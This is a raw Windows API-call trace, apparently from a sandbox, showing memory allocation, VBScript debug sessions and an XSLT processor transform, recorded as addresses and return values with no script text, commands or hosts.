[0566.082] GetCurrentProcessId () returned 0x520
[0566.082] GetCurrentThreadId () returned 0x440
[0566.082] GetTickCount () returned 0x25d85
[0566.083] ISystemDebugEventFire:BeginSession (This=0x30b4e0, guidSourceID=0x7fef591d5d8, strSessionName="VBScript:00001312:00001088:00155013") returned 0x0
[0566.083] DllRegisterServer () returned 0x0
[0566.083] GetCurrentThreadId () returned 0x440
[0566.084] realloc (_Block=0x0, _Size=0xc8) returned 0x18d950
[0566.084] memcpy (in: _Dst=0x18d950, _Src=0x7fef5930800, _Size=0x10 | out: _Dst=0x18d950) returned 0x18d950
[0566.084] memcpy (in: _Dst=0x18d960, _Src=0x7fef591f2c8, _Size=0x6 | out: _Dst=0x18d960) returned 0x18d960
[0566.084] memcpy (in: _Dst=0x18d966, _Src=0x7fef591f2d0, _Size=0x18 | out: _Dst=0x18d966) returned 0x18d966
[0566.084] ??2@YAPEAX_K@Z () returned 0x1887c0
[0566.084] malloc (_Size=0x1008) returned 0x18e5d0
[0566.084] ??2@YAPEAX_K@Z () returned 0x18f5e0
[0566.084] malloc (_Size=0x400) returned 0x18f770
[0566.085] malloc (_Size=0x108) returned 0x18ab20
[0566.085] malloc (_Size=0x2008) returned 0x37dfd0
[0566.085] memcpy (in: _Dst=0x37e004, _Src=0x1fe6d12, _Size=0xc | out: _Dst=0x37e004) returned 0x37e004
[0566.085] memcpy (in: _Dst=0x37e044, _Src=0x1fe6d20, _Size=0x10 | out: _Dst=0x37e044) returned 0x37e044
[0566.085] memcpy (in: _Dst=0x37e08c, _Src=0x1fe6e30, _Size=0x6 | out: _Dst=0x37e08c) returned 0x37e08c
[0566.085] memcpy (in: _Dst=0x37e0c4, _Src=0x1fe6e38, _Size=0xa | out: _Dst=0x37e0c4) returned 0x37e0c4
[0566.085] memcpy (in: _Dst=0x37e104, _Src=0x1fe6e4c, _Size=0x10 | out: _Dst=0x37e104) returned 0x37e104
[0566.086] memcpy (in: _Dst=0x37e14c, _Src=0x1fe6e70, _Size=0xc | out: _Dst=0x37e14c) returned 0x37e14c
[0566.086] malloc (_Size=0x208) returned 0x18fb80
[0566.086] memcpy (in: _Dst=0x37e18c, _Src=0x1fe6e90, _Size=0x4 | out: _Dst=0x37e18c) returned 0x37e18c
[0566.086] memcpy (in: _Dst=0x37e1c4, _Src=0x1fe6ea8, _Size=0xa | out: _Dst=0x37e1c4) returned 0x37e1c4
[0566.086] memcpy (in: _Dst=0x37e204, _Src=0x1fe6ebc, _Size=0x10 | out: _Dst=0x37e204) returned 0x37e204
[0566.086] memcpy (in: _Dst=0x37e24c, _Src=0x1fe6ed6, _Size=0x12 | out: _Dst=0x37e24c) returned 0x37e24c
[0566.086] malloc (_Size=0x408) returned 0x37ffe0
[0566.087] memcpy (in: _Dst=0x37e294, _Src=0x1fe6f08, _Size=0x8 | out: _Dst=0x37e294) returned 0x37e294
[0566.087] memcpy (in: _Dst=0x37e2d4, _Src=0x1fe6f30, _Size=0x18 | out: _Dst=0x37e2d4) returned 0x37e2d4
[0566.087] memcpy (in: _Dst=0x37e324, _Src=0x1fe6f4a, _Size=0x10 | out: _Dst=0x37e324) returned 0x37e324
[0566.087] memcpy (in: _Dst=0x37e36c, _Src=0x1fe6f5c, _Size=0x18 | out: _Dst=0x37e36c) returned 0x37e36c
[0566.087] memcpy (in: _Dst=0x37e3bc, _Src=0x1fe6f76, _Size=0x2 | out: _Dst=0x37e3bc) returned 0x37e3bc
[0566.087] memcpy (in: _Dst=0x37e3f4, _Src=0x1fe6fc4, _Size=0x6 | out: _Dst=0x37e3f4) returned 0x37e3f4
[0566.087] malloc (_Size=0x808) returned 0x3803f0
[0566.087] memcpy (in: _Dst=0x37e42c, _Src=0x1fe6ff0, _Size=0xa | out: _Dst=0x37e42c) returned 0x37e42c
[0566.087] memcpy (in: _Dst=0x37e46c, _Src=0x1fe6ffc, _Size=0x8 | out: _Dst=0x37e46c) returned 0x37e46c
[0566.087] memcpy (in: _Dst=0x37e4ac, _Src=0x1fe7018, _Size=0x2 | out: _Dst=0x37e4ac) returned 0x37e4ac
[0566.088] memcpy (in: _Dst=0x37e4e4, _Src=0x1fe702c, _Size=0x8 | out: _Dst=0x37e4e4) returned 0x37e4e4
[0566.088] memcpy (in: _Dst=0x37e524, _Src=0x18f64c, _Size=0x20 | out: _Dst=0x37e524) returned 0x37e524
[0566.088] memcpy (in: _Dst=0x37e57c, _Src=0x1fe709c, _Size=0xa | out: _Dst=0x37e57c) returned 0x37e57c
[0566.088] memcpy (in: _Dst=0x37e5bc, _Src=0x1fe70b2, _Size=0x6 | out: _Dst=0x37e5bc) returned 0x37e5bc
[0566.088] memcpy (in: _Dst=0x37e5f4, _Src=0x1fe70f8, _Size=0x8 | out: _Dst=0x37e5f4) returned 0x37e5f4
[0566.089] memcpy (in: _Dst=0x37e634, _Src=0x1fe711a, _Size=0x8 | out: _Dst=0x37e634) returned 0x37e634
[0566.089] memcpy (in: _Dst=0x37e674, _Src=0x1fe7162, _Size=0x16 | out: _Dst=0x37e674) returned 0x37e674
[0566.089] malloc (_Size=0x1008) returned 0x380c00
[0566.089] memcpy (in: _Dst=0x37e6bc, _Src=0x1fe7218, _Size=0x12 | out: _Dst=0x37e6bc) returned 0x37e6bc
[0566.089] memcpy (in: _Dst=0x37e704, _Src=0x1fe7242, _Size=0xa | out: _Dst=0x37e704) returned 0x37e704
[0566.089] memcpy (in: _Dst=0x37e744, _Src=0x1fe7250, _Size=0x8 | out: _Dst=0x37e744) returned 0x37e744
[0566.090] memcpy (in: _Dst=0x37e784, _Src=0x1fe7262, _Size=0xe | out: _Dst=0x37e784) returned 0x37e784
[0566.090] memcpy (in: _Dst=0x37e7c4, _Src=0x1fe727a, _Size=0x4 | out: _Dst=0x37e7c4) returned 0x37e7c4
[0566.090] memcpy (in: _Dst=0x37e7fc, _Src=0x1fe7292, _Size=0x8 | out: _Dst=0x37e7fc) returned 0x37e7fc
[0566.090] memcpy (in: _Dst=0x37e83c, _Src=0x1fe7338, _Size=0x4 | out: _Dst=0x37e83c) returned 0x37e83c
[0566.090] memcpy (in: _Dst=0x37e874, _Src=0x1fe733e, _Size=0x14 | out: _Dst=0x37e874) returned 0x37e874
[0566.090] memcpy (in: _Dst=0x37e8bc, _Src=0x1fe7354, _Size=0x18 | out: _Dst=0x37e8bc) returned 0x37e8bc
[0566.090] memcpy (in: _Dst=0x37e90c, _Src=0x18f64c, _Size=0x8 | out: _Dst=0x37e90c) returned 0x37e90c
[0566.090] memcpy (in: _Dst=0x37e94c, _Src=0x1fe737e, _Size=0xa | out: _Dst=0x37e94c) returned 0x37e94c
[0566.090] memcpy (in: _Dst=0x37e98c, _Src=0x1fe7392, _Size=0x8 | out: _Dst=0x37e98c) returned 0x37e98c
[0566.091] memcpy (in: _Dst=0x37e9cc, _Src=0x1fe7502, _Size=0xe | out: _Dst=0x37e9cc) returned 0x37e9cc
[0566.091] memcpy (in: _Dst=0x37ea0c, _Src=0x1fe7518, _Size=0x10 | out: _Dst=0x37ea0c) returned 0x37ea0c
[0566.091] memcpy (in: _Dst=0x37ea54, _Src=0x18f64c, _Size=0x1c | out: _Dst=0x37ea54) returned 0x37ea54
[0566.092] memcpy (in: _Dst=0x37eaa4, _Src=0x1fe7574, _Size=0x1a | out: _Dst=0x37eaa4) returned 0x37eaa4
[0566.092] memcpy (in: _Dst=0x37eaf4, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37eaf4) returned 0x37eaf4
[0566.092] memcpy (in: _Dst=0x37eb2c, _Src=0x1fe75f2, _Size=0x14 | out: _Dst=0x37eb2c) returned 0x37eb2c
[0566.092] memcpy (in: _Dst=0x37eb74, _Src=0x1fe7608, _Size=0x14 | out: _Dst=0x37eb74) returned 0x37eb74
[0566.092] memcpy (in: _Dst=0x37ebbc, _Src=0x1fe761e, _Size=0xc | out: _Dst=0x37ebbc) returned 0x37ebbc
[0566.092] memcpy (in: _Dst=0x37ebfc, _Src=0x18f64c, _Size=0x8 | out: _Dst=0x37ebfc) returned 0x37ebfc
[0566.092] memcpy (in: _Dst=0x37ec3c, _Src=0x1fe769a, _Size=0x12 | out: _Dst=0x37ec3c) returned 0x37ec3c
[0566.092] memcpy (in: _Dst=0x37ec84, _Src=0x1fe76b2, _Size=0x6 | out: _Dst=0x37ec84) returned 0x37ec84
[0566.092] memcpy (in: _Dst=0x37ecbc, _Src=0x1fe76ba, _Size=0x8 | out: _Dst=0x37ecbc) returned 0x37ecbc
[0566.092] memcpy (in: _Dst=0x37ecfc, _Src=0x1fe76d0, _Size=0x4 | out: _Dst=0x37ecfc) returned 0x37ecfc
[0566.093] memcpy (in: _Dst=0x37ed34, _Src=0x18f64c, _Size=0xc | out: _Dst=0x37ed34) returned 0x37ed34
[0566.093] memcpy (in: _Dst=0x37ed74, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37ed74) returned 0x37ed74
[0566.093] malloc (_Size=0x2008) returned 0x381c10
[0566.093] memcpy (in: _Dst=0x37edac, _Src=0x1fe77e0, _Size=0x1c | out: _Dst=0x37edac) returned 0x37edac
[0566.093] memcpy (in: _Dst=0x37edfc, _Src=0x1fe7818, _Size=0xc | out: _Dst=0x37edfc) returned 0x37edfc
[0566.093] memcpy (in: _Dst=0x37ee3c, _Src=0x18f64c, _Size=0xc | out: _Dst=0x37ee3c) returned 0x37ee3c
[0566.094] memcpy (in: _Dst=0x37ee7c, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37ee7c) returned 0x37ee7c
[0566.095] memcpy (in: _Dst=0x37eeb4, _Src=0x18f64c, _Size=0x4 | out: _Dst=0x37eeb4) returned 0x37eeb4
[0566.095] memcpy (in: _Dst=0x37eeec, _Src=0x1fe7ae0, _Size=0x8 | out: _Dst=0x37eeec) returned 0x37eeec
[0566.095] memcpy (in: _Dst=0x37ef2c, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37ef2c) returned 0x37ef2c
[0566.095] memcpy (in: _Dst=0x37ef64, _Src=0x18f64c, _Size=0x24 | out: _Dst=0x37ef64) returned 0x37ef64
[0566.095] memcpy (in: _Dst=0x37efbc, _Src=0x1fe7bf4, _Size=0xc | out: _Dst=0x37efbc) returned 0x37efbc
[0566.096] memcpy (in: _Dst=0x37effc, _Src=0x1fe7c04, _Size=0x8 | out: _Dst=0x37effc) returned 0x37effc
[0566.096] memcpy (in: _Dst=0x37f03c, _Src=0x1fe7c10, _Size=0x10 | out: _Dst=0x37f03c) returned 0x37f03c
[0566.096] memcpy (in: _Dst=0x37f084, _Src=0x1fe7c24, _Size=0x1c | out: _Dst=0x37f084) returned 0x37f084
[0566.096] memcpy (in: _Dst=0x37f0d4, _Src=0x1fe7c44, _Size=0x1a | out: _Dst=0x37f0d4) returned 0x37f0d4
[0566.096] memcpy (in: _Dst=0x37f124, _Src=0x1fe7c62, _Size=0x16 | out: _Dst=0x37f124) returned 0x37f124
[0566.096] memcpy (in: _Dst=0x37f16c, _Src=0x1fe7c7c, _Size=0x14 | out: _Dst=0x37f16c) returned 0x37f16c
[0566.096] memcpy (in: _Dst=0x37f1b4, _Src=0x1fe7cc0, _Size=0x16 | out: _Dst=0x37f1b4) returned 0x37f1b4
[0566.096] memcpy (in: _Dst=0x37f1fc, _Src=0x18f64c, _Size=0x1e | out: _Dst=0x37f1fc) returned 0x37f1fc
[0566.096] memcpy (in: _Dst=0x37f24c, _Src=0x18f64c, _Size=0x20 | out: _Dst=0x37f24c) returned 0x37f24c
[0566.096] memcpy (in: _Dst=0x37f2a4, _Src=0x1fe7d78, _Size=0x6 | out: _Dst=0x37f2a4) returned 0x37f2a4
[0566.097] memcpy (in: _Dst=0x37f2dc, _Src=0x1fe7da0, _Size=0x20 | out: _Dst=0x37f2dc) returned 0x37f2dc
[0566.097] memcpy (in: _Dst=0x37f334, _Src=0x18f64c, _Size=0x8 | out: _Dst=0x37f334) returned 0x37f334
[0566.097] memcpy (in: _Dst=0x37f374, _Src=0x1fe7dde, _Size=0x6 | out: _Dst=0x37f374) returned 0x37f374
[0566.097] memcpy (in: _Dst=0x37f3ac, _Src=0x1fe7df8, _Size=0x4 | out: _Dst=0x37f3ac) returned 0x37f3ac
[0566.097] memcpy (in: _Dst=0x37f3e4, _Src=0x1fe7dfe, _Size=0xe | out: _Dst=0x37f3e4) returned 0x37f3e4
[0566.097] memcpy (in: _Dst=0x37f424, _Src=0x18f64c, _Size=0x4 | out: _Dst=0x37f424) returned 0x37f424
[0566.097] memcpy (in: _Dst=0x37f45c, _Src=0x1fe7e72, _Size=0x8 | out: _Dst=0x37f45c) returned 0x37f45c
[0566.098] memcpy (in: _Dst=0x37f49c, _Src=0x18f64c, _Size=0x24 | out: _Dst=0x37f49c) returned 0x37f49c
[0566.098] memcpy (in: _Dst=0x37f4f4, _Src=0x18f64c, _Size=0x12 | out: _Dst=0x37f4f4) returned 0x37f4f4
[0566.099] memcpy (in: _Dst=0x37f53c, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37f53c) returned 0x37f53c
[0566.099] memcpy (in: _Dst=0x37f574, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37f574) returned 0x37f574
[0566.099] memcpy (in: _Dst=0x37f5ac, _Src=0x18f64c, _Size=0x1e | out: _Dst=0x37f5ac) returned 0x37f5ac
[0566.100] memcpy (in: _Dst=0x37f5fc, _Src=0x18f64c, _Size=0x12 | out: _Dst=0x37f5fc) returned 0x37f5fc
[0566.100] malloc (_Size=0x4008) returned 0x383c20
[0566.100] memcpy (in: _Dst=0x37f644, _Src=0x18f64c, _Size=0x14 | out: _Dst=0x37f644) returned 0x37f644
[0566.101] memcpy (in: _Dst=0x37f68c, _Src=0x18f64c, _Size=0x2 | out: _Dst=0x37f68c) returned 0x37f68c
[0566.103] free (_Block=0x37dfd0)
[0566.103] free (_Block=0x18e5d0)
[0566.103] ??3@YAXPEAX@Z () returned 0x74007400820001
[0566.104] free (_Block=0x18f770)
[0566.104] free (_Block=0x38bf70)
[0566.104] free (_Block=0x387f60)
[0566.104] free (_Block=0x383c20)
[0566.104] free (_Block=0x381c10)
[0566.105] free (_Block=0x380c00)
[0566.105] free (_Block=0x3803f0)
[0566.105] free (_Block=0x37ffe0)
[0566.106] free (_Block=0x18fb80)
[0566.106] free (_Block=0x18ab20)
[0566.106] ??2@YAPEAX_K@Z () returned 0x18e5d0
[0566.106] ??2@YAPEAX_K@Z () returned 0x18cf40
[0566.106] malloc (_Size=0x10) returned 0x189560
[0566.106] memcpy (in: _Dst=0x189560, _Src=0xaec00, _Size=0x10 | out: _Dst=0x189560) returned 0x189560
[0566.107] free (_Block=0x18d950)
[0566.108] GetUserDefaultLCID () returned 0x409
[0566.108] GetACP () returned 0x4e4
[0566.108] ??3@YAXPEAX@Z () returned 0x740075007e0001
[0566.108] ISystemDebugEventFire:EndSession (This=0x30b4e0) returned 0x0
[0566.108] IUnknown:Release (This=0x30b4e0) returned 0x1
[0566.108] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.108] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.110] IUnknown:Release (This=0x30b4e0) returned 0x0
[0566.110] DllRegisterServer () returned 0x0
[0566.110] XSLTemplate:IXSLTemplate:createProcessor (in: This=0x1fd7620, ppProcessor=0xaf1c0 | out: ppProcessor=0xaf1c0*=0x1fd9640) returned 0x0
[0566.111] FreeThreadedDOMDocument:IUnknown:AddRef (This=0x1fd71d0) returned 0x2
[0566.111] IXSLProcessor:put_input (This=0x1fd9640, input=0xaf400*(varType=0x9, wReserved1=0xf59a, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x1fd71d0, varVal2=0x1)) returned 0x0
[0566.111] GetStdHandle (nStdHandle=0xfffffff5) returned 0x60
[0566.111] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x60, lpConsoleScreenBufferInfo=0xaf0c0 | out: lpConsoleScreenBufferInfo=0xaf0c0) returned 0
[0566.118] GetStdHandle (nStdHandle=0xfffffff5) returned 0x60
[0566.118] GetFileType (hFile=0x60) returned 0x3
[0566.118] IXSLProcessor:transform (in: This=0x1fd9640, pDone=0xaf478 | out: pDone=0xaf478*=0xffff) returned 0x0
[0566.132] GetCurrentThreadId () returned 0x440
[0566.133] ??2@YAPEAX_K@Z () returned 0x18d7f0
[0566.133] ??2@YAPEAX_K@Z () returned 0x188740
[0566.133] GetCurrentThreadId () returned 0x440
[0566.133] ??2@YAPEAX_K@Z () returned 0x18d8c0
[0566.133] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0566.133] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xaeee0, cchData=6 | out: lpLCData="1252") returned 5
[0566.133] IsValidCodePage (CodePage=0x4e4) returned 1
[0566.133] DllRegisterServer () returned 0x0
[0566.133] CoCreateInstance (in: rclsid=0x7fef591d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef591d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x18e588 | out: ppv=0x18e588*=0x30b4e0) returned 0x0
[0566.134] IUnknown:AddRef (This=0x30b4e0) returned 0x2
[0566.134] GetCurrentProcessId () returned 0x520
[0566.134] GetCurrentThreadId () returned 0x440
[0566.134] GetTickCount () returned 0x25dc3
[0566.134] ISystemDebugEventFire:BeginSession (This=0x30b4e0, guidSourceID=0x7fef591d5d8, strSessionName="VBScript:00001312:00001088:00155075") returned 0x0
[0566.134] GetCurrentThreadId () returned 0x440
[0566.134] ??2@YAPEAX_K@Z () returned 0x18d950
[0566.134] ??2@YAPEAX_K@Z () returned 0x189040
[0566.135] ??2@YAPEAX_K@Z () returned 0x18d9a0
[0566.135] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.137] malloc (_Size=0x988) returned 0x18e630
[0566.137] GetCurrentThreadId () returned 0x440
[0566.137] DllRegisterServer () returned 0x0
[0566.137] ??2@YAPEAX_K@Z () returned 0x18d9f0
[0566.216] ??2@YAPEAX_K@Z () returned 0x18efc0
[0566.216] malloc (_Size=0x80) returned 0x18f0c0
[0566.216] malloc (_Size=0x108) returned 0x18ab20
[0566.216] memcpy (in: _Dst=0x18ab68, _Src=0x38c468, _Size=0x1a | out: _Dst=0x18ab68) returned 0x18ab68
[0566.216] ??2@YAPEAX_K@Z () returned 0x18f150
[0566.217] memcpy (in: _Dst=0x18abc8, _Src=0x38c48c, _Size=0xc | out: _Dst=0x18abc8) returned 0x18abc8
[0566.217] ??2@YAPEAX_K@Z () returned 0x18f1a0
[0566.217] malloc (_Size=0x208) returned 0x18f1f0
[0566.217] memcpy (in: _Dst=0x18f238, _Src=0x38c4a0, _Size=0x18 | out: _Dst=0x18f238) returned 0x18f238
[0566.217] ??2@YAPEAX_K@Z () returned 0x18f400
[0566.218] memcpy (in: _Dst=0x18f290, _Src=0x38c4c0, _Size=0x14 | out: _Dst=0x18f290) returned 0x18f290
[0566.218] ??2@YAPEAX_K@Z () returned 0x18f450
[0566.218] memcpy (in: _Dst=0x18f2e8, _Src=0x38c4dc, _Size=0x1c | out: _Dst=0x18f2e8) returned 0x18f2e8
[0566.218] ??2@YAPEAX_K@Z () returned 0x18f4a0
[0566.218] memcpy (in: _Dst=0x18f348, _Src=0x38c500, _Size=0x14 | out: _Dst=0x18f348) returned 0x18f348
[0566.218] GetCurrentThreadId () returned 0x440
[0566.219] memcpy (in: _Dst=0x18f3a0, _Src=0x38c51c, _Size=0xc | out: _Dst=0x18f3a0) returned 0x18f3a0
[0566.219] GetCurrentThreadId () returned 0x440
[0566.219] malloc (_Size=0x408) returned 0x18f4f0
[0566.219] memcpy (in: _Dst=0x18f538, _Src=0x38c530, _Size=0x12 | out: _Dst=0x18f538) returned 0x18f538
[0566.219] GetCurrentThreadId () returned 0x440
[0566.219] memcpy (in: _Dst=0x18f590, _Src=0x38c54c, _Size=0xe | out: _Dst=0x18f590) returned 0x18f590
[0566.219] GetCurrentThreadId () returned 0x440
[0566.219] memcpy (in: _Dst=0x18f5e0, _Src=0x38c564, _Size=0x6 | out: _Dst=0x18f5e0) returned 0x18f5e0
[0566.219] GetCurrentThreadId () returned 0x440
[0566.220] memcpy (in: _Dst=0x18f628, _Src=0x38c574, _Size=0xc | out: _Dst=0x18f628) returned 0x18f628
[0566.220] GetCurrentThreadId () returned 0x440
[0566.220] memcpy (in: _Dst=0x18f678, _Src=0x38c588, _Size=0x12 | out: _Dst=0x18f678) returned 0x18f678
[0566.220] GetCurrentThreadId () returned 0x440
[0566.220] memcpy (in: _Dst=0x18f6d0, _Src=0x38c5a4, _Size=0x14 | out: _Dst=0x18f6d0) returned 0x18f6d0
[0566.220] GetCurrentThreadId () returned 0x440
[0566.220] memcpy (in: _Dst=0x18f728, _Src=0x38c5c0, _Size=0xa | out: _Dst=0x18f728) returned 0x18f728
[0566.221] GetCurrentThreadId () returned 0x440
[0566.221] memcpy (in: _Dst=0x18f778, _Src=0x38c5d4, _Size=0x1a | out: _Dst=0x18f778) returned 0x18f778
[0566.221] ??2@YAPEAX_K@Z () returned 0x18f900
[0566.292] GetCurrentThreadId () returned 0x440
[0566.292] DllRegisterServer () returned 0x0
[0566.292] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.293] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.305] GetCurrentThreadId () returned 0x440
[0566.306] DllRegisterServer () returned 0x0
[0566.307] GetCurrentThreadId () returned 0x440
[0566.307] realloc (_Block=0x0, _Size=0xc8) returned 0x18fdc0
[0566.307] memcpy (in: _Dst=0x18fdc0, _Src=0x7fef5930800, _Size=0x10 | out: _Dst=0x18fdc0) returned 0x18fdc0
[0566.307] memcpy (in: _Dst=0x18fdd0, _Src=0x7fef591f2c8, _Size=0x6 | out: _Dst=0x18fdd0) returned 0x18fdd0
[0566.307] memcpy (in: _Dst=0x18fdd6, _Src=0x7fef591f2d0, _Size=0x18 | out: _Dst=0x18fdd6) returned 0x18fdd6
[0566.307] ??2@YAPEAX_K@Z () returned 0x1887c0
[0566.307] malloc (_Size=0x1008) returned 0x390440
[0566.307] ??2@YAPEAX_K@Z () returned 0x391450
[0566.307] malloc (_Size=0x2008) returned 0x3915e0
[0566.307] memcpy (in: _Dst=0x391614, _Src=0x25b1a50, _Size=0x18 | out: _Dst=0x391614) returned 0x391614
[0566.307] malloc (_Size=0x108) returned 0x18ac30
[0566.308] memcpy (in: _Dst=0x391664, _Src=0x25b1a6a, _Size=0x8 | out: _Dst=0x391664) returned 0x391664
[0566.308] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.308] malloc (_Size=0x208) returned 0x3935f0
[0566.308] malloc (_Size=0x40) returned 0x18d9a0
[0566.308] malloc (_Size=0x138) returned 0x18fe90
[0566.308] memcpy (in: _Dst=0x18fe90, _Src=0xae7c0, _Size=0x30 | out: _Dst=0x18fe90) returned 0x18fe90
[0566.308] memcpy (in: _Dst=0x18fec8, _Src=0x391664, _Size=0xa | out: _Dst=0x18fec8) returned 0x18fec8
[0566.308] memcpy (in: _Dst=0x18fedc, _Src=0x391614, _Size=0x1a | out: _Dst=0x18fedc) returned 0x18fedc
[0566.308] memcpy (in: _Dst=0x18fef8, _Src=0x0, _Size=0x0 | out: _Dst=0x18fef8) returned 0x18fef8
[0566.308] memcpy (in: _Dst=0x18fef8, _Src=0x18d9a0, _Size=0x8 | out: _Dst=0x18fef8) returned 0x18fef8
[0566.308] memcpy (in: _Dst=0x18ff08, _Src=0xaed80, _Size=0x20 | out: _Dst=0x18ff08) returned 0x18ff08
[0566.308] memcpy (in: _Dst=0x18ff28, _Src=0x18fdc0, _Size=0x30 | out: _Dst=0x18ff28) returned 0x18ff28
[0566.308] memcpy (in: _Dst=0x18ff58, _Src=0x25b1a50, _Size=0x24 | out: _Dst=0x18ff58) returned 0x18ff58
[0566.308] memcpy (in: _Dst=0x18ff80, _Src=0x393610, _Size=0x30 | out: _Dst=0x18ff80) returned 0x18ff80
[0566.308] memcpy (in: _Dst=0x18ffb0, _Src=0x39364c, _Size=0x13 | out: _Dst=0x18ffb0) returned 0x18ffb0
[0566.308] ??2@YAPEAX_K@Z () returned 0x1895a0
[0566.309] free (_Block=0x3915e0)
[0566.310] free (_Block=0x390440)
[0566.310] ??3@YAXPEAX@Z () returned 0x74007600820001
[0566.310] free (_Block=0x18d9a0)
[0566.310] free (_Block=0x3935f0)
[0566.312] free (_Block=0x18ac30)
[0566.312] ??2@YAPEAX_K@Z () returned 0x390440
[0566.312] realloc (_Block=0x189560, _Size=0x40) returned 0x18d9a0
[0566.312] memcpy (in: _Dst=0x18d9b0, _Src=0xaec60, _Size=0x10 | out: _Dst=0x18d9b0) returned 0x18d9b0
[0566.313] ??2@YAPEAX_K@Z () returned 0x3904a0
[0566.313] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.313] GetCurrentThreadId () returned 0x440
[0566.313] DllRegisterServer () returned 0x0
[0566.314] memcpy (in: _Dst=0x18f7d8, _Src=0x18fec8, _Size=0xa | out: _Dst=0x18f7d8) returned 0x18f7d8
[0566.315] GetCurrentThreadId () returned 0x440
[0566.315] DllRegisterServer () returned 0x0
[0566.316] ??3@YAXPEAX@Z () returned 0x4d01
[0566.316] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.317] free (_Block=0x18fe90)
[0566.317] ??3@YAXPEAX@Z () returned 0x20016700580001
[0566.317] ??3@YAXPEAX@Z () returned 0x4d01
[0566.317] free (_Block=0x18fdc0)
[0566.319] GetCurrentThreadId () returned 0x440
[0566.319] realloc (_Block=0x0, _Size=0xc8) returned 0x18fdc0
[0566.319] memcpy (in: _Dst=0x18fdc0, _Src=0x7fef5930800, _Size=0x10 | out: _Dst=0x18fdc0) returned 0x18fdc0
[0566.319] memcpy (in: _Dst=0x18fdd0, _Src=0x7fef591f2c8, _Size=0x6 | out: _Dst=0x18fdd0) returned 0x18fdd0
[0566.319] memcpy (in: _Dst=0x18fdd6, _Src=0x7fef591f2d0, _Size=0x18 | out: _Dst=0x18fdd6) returned 0x18fdd6
[0566.319] ??2@YAPEAX_K@Z () returned 0x1887c0
[0566.319] malloc (_Size=0x1008) returned 0x390440
[0566.319] ??2@YAPEAX_K@Z () returned 0x391450
[0566.319] malloc (_Size=0x2008) returned 0x3915e0
[0566.319] memcpy (in: _Dst=0x391614, _Src=0x25b1b20, _Size=0x16 | out: _Dst=0x391614) returned 0x391614
[0566.319] malloc (_Size=0x108) returned 0x18ac30
[0566.320] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.320] malloc (_Size=0x208) returned 0x3935f0
[0566.320] malloc (_Size=0x40) returned 0x18fe90
[0566.320] malloc (_Size=0x110) returned 0x391450
[0566.320] memcpy (in: _Dst=0x391450, _Src=0xae7c0, _Size=0x30 | out: _Dst=0x391450) returned 0x391450
[0566.320] memcpy (in: _Dst=0x391488, _Src=0x391614, _Size=0x18 | out: _Dst=0x391488) returned 0x391488
[0566.320] memcpy (in: _Dst=0x3914a0, _Src=0x0, _Size=0x0 | out: _Dst=0x3914a0) returned 0x3914a0
[0566.320] memcpy (in: _Dst=0x3914a0, _Src=0x18fe90, _Size=0x8 | out: _Dst=0x3914a0) returned 0x3914a0
[0566.320] memcpy (in: _Dst=0x3914b0, _Src=0xaed80, _Size=0x20 | out: _Dst=0x3914b0) returned 0x3914b0
[0566.320] memcpy (in: _Dst=0x3914d0, _Src=0x18fdc0, _Size=0x30 | out: _Dst=0x3914d0) returned 0x3914d0
[0566.320] memcpy (in: _Dst=0x391500, _Src=0x25b1b20, _Size=0x1a | out: _Dst=0x391500) returned 0x391500
[0566.320] memcpy (in: _Dst=0x391520, _Src=0x393610, _Size=0x30 | out: _Dst=0x391520) returned 0x391520
[0566.320] memcpy (in: _Dst=0x391550, _Src=0x39364c, _Size=0xe | out: _Dst=0x391550) returned 0x391550
[0566.320] ??2@YAPEAX_K@Z () returned 0x1895a0
[0566.321] free (_Block=0x3915e0)
[0566.321] free (_Block=0x390440)
[0566.321] ??3@YAXPEAX@Z () returned 0x74007700820001
[0566.321] free (_Block=0x18fe90)
[0566.322] free (_Block=0x3935f0)
[0566.322] free (_Block=0x18ac30)
[0566.322] ??2@YAPEAX_K@Z () returned 0x18fe90
[0566.322] memcpy (in: _Dst=0x18d9b0, _Src=0xaec60, _Size=0x10 | out: _Dst=0x18d9b0) returned 0x18d9b0
[0566.323] ??2@YAPEAX_K@Z () returned 0x18fef0
[0566.323] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.323] GetCurrentThreadId () returned 0x440
[0566.323] DllRegisterServer () returned 0x0
[0566.324] GetCurrentThreadId () returned 0x440
[0566.324] DllRegisterServer () returned 0x0
[0566.324] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.324] ISystemDebugEventFire:IsActive (This=0x30b4e0) returned 0x1
[0566.324] free (_Block=0x391450)
[0566.324] ??3@YAXPEAX@Z () returned 0x20016800580001
[0566.325] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.325] free (_Block=0x18fdc0)
[0566.325] GetCurrentThreadId () returned 0x440
[0566.325] realloc (_Block=0x0, _Size=0xc8) returned 0x18fdc0
[0566.325] memcpy (in: _Dst=0x18fdc0, _Src=0x7fef5930800, _Size=0x10 | out: _Dst=0x18fdc0) returned 0x18fdc0
